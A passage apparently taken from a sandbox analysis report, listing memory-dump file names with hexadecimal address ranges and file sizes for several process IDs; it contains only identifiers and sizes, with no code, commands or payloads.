                                                                                                                Filesize

                                                                                                                168KB

                                                                                                              • memory/996-97-0x0000027D235C0000-0x0000027D235EA000-memory.dmp

                                                                                                                Filesize

                                                                                                                168KB

                                                                                                              • memory/996-89-0x0000027D235C0000-0x0000027D235EA000-memory.dmp

                                                                                                                Filesize

                                                                                                                168KB

                                                                                                              • memory/996-95-0x0000027D235C0000-0x0000027D235EA000-memory.dmp

                                                                                                                Filesize

                                                                                                                168KB

                                                                                                              • memory/1692-52-0x00007FFA018E0000-0x00007FFA01AE9000-memory.dmp

                                                                                                                Filesize

                                                                                                                2.0MB

                                                                                                              • memory/1692-48-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/1692-47-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/1692-46-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/1692-54-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/1692-53-0x00007FFA00640000-0x00007FFA006FD000-memory.dmp

                                                                                                                Filesize

                                                                                                                756KB

                                                                                                              • memory/1692-51-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/1692-49-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                                                                Filesize

                                                                                                                32KB

                                                                                                              • memory/2360-5-0x00000206F46E0000-0x00000206F4702000-memory.dmp

                                                                                                                Filesize

                                                                                                                136KB

                                                                                                              • memory/2360-15-0x00007FF9E0870000-0x00007FF9E1332000-memory.dmp

                                                                                                                Filesize

                                                                                                                10.8MB

                                                                                                              • memory/2360-16-0x00007FF9E0870000-0x00007FF9E1332000-memory.dmp

                                                                                                                Filesize

                                                                                                                10.8MB

                                                                                                              • memory/2360-18-0x00007FF9E0870000-0x00007FF9E1332000-memory.dmp

                                                                                                                Filesize

                                                                                                                10.8MB

                                                                                                              • memory/2360-22-0x00007FF9E0870000-0x00007FF9E1332000-memory.dmp

                                                                                                                Filesize

                                                                                                                10.8MB

                                                                                                              • memory/2360-6-0x00007FF9E0870000-0x00007FF9E1332000-memory.dmp

                                                                                                                Filesize

                                                                                                                10.8MB

                                                                                                              • memory/2368-23-0x000000001C360000-0x000000001C9AE000-memory.dmp

                                                                                                                Filesize

                                                                                                                6.3MB

                                                                                                              • memory/2368-28-0x000000001DE30000-0x000000001DE80000-memory.dmp

                                                                                                                Filesize

                                                                                                                320KB

                                                                                                              • memory/2368-27-0x000000001CFE0000-0x000000001CFE6000-memory.dmp

                                                                                                                Filesize

                                                                                                                24KB

                                                                                                              • memory/2368-30-0x000000001E8B0000-0x000000001EDD8000-memory.dmp

                                                                                                                Filesize

                                                                                                                5.2MB

                                                                                                              • memory/2368-26-0x000000001CFD0000-0x000000001CFD6000-memory.dmp

                                                                                                                Filesize

                                                                                                                24KB

                                                                                                              • memory/2368-25-0x000000001D7C0000-0x000000001D9DE000-memory.dmp

                                                                                                                Filesize

                                                                                                                2.1MB

                                                                                                              • memory/2368-24-0x000000001D6B0000-0x000000001D7C2000-memory.dmp

                                                                                                                Filesize

                                                                                                                1.1MB

                                                                                                              • memory/2368-29-0x000000001DF70000-0x000000001E022000-memory.dmp

                                                                                                                Filesize

                                                                                                                712KB

                                                                                                              • memory/2624-0-0x00007FF9E0873000-0x00007FF9E0875000-memory.dmp

                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/2624-1-0x0000000000DC0000-0x00000000010B8000-memory.dmp

                                                                                                                Filesize

                                                                                                                3.0MB

                                                                                                              • memory/2624-2-0x00007FF9E0873000-0x00007FF9E0875000-memory.dmp

                                                                                                                Filesize

                                                                                                                8KB

                                                                                                              • memory/3564-31-0x0000000000EE0000-0x0000000000F09000-memory.dmp

                                                                                                                Filesize

                                                                                                                164KB

                                                                                                              • memory/4296-32-0x0000000000400000-0x000000000042B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/4296-34-0x0000000000400000-0x000000000042B000-memory.dmp

                                                                                                                Filesize

                                                                                                                172KB

                                                                                                              • memory/4964-44-0x00007FFA018E0000-0x00007FFA01AE9000-memory.dmp

                                                                                                                Filesize

                                                                                                                2.0MB

                                                                                                              • memory/4964-45-0x00007FFA00640000-0x00007FFA006FD000-memory.dmp

                                                                                                                Filesize

                                                                                                                756KB

                                                                                                              • memory/4964-43-0x000001DE374A0000-0x000001DE374CA000-memory.dmp

                                                                                                                Filesize

                                                                                                                168KB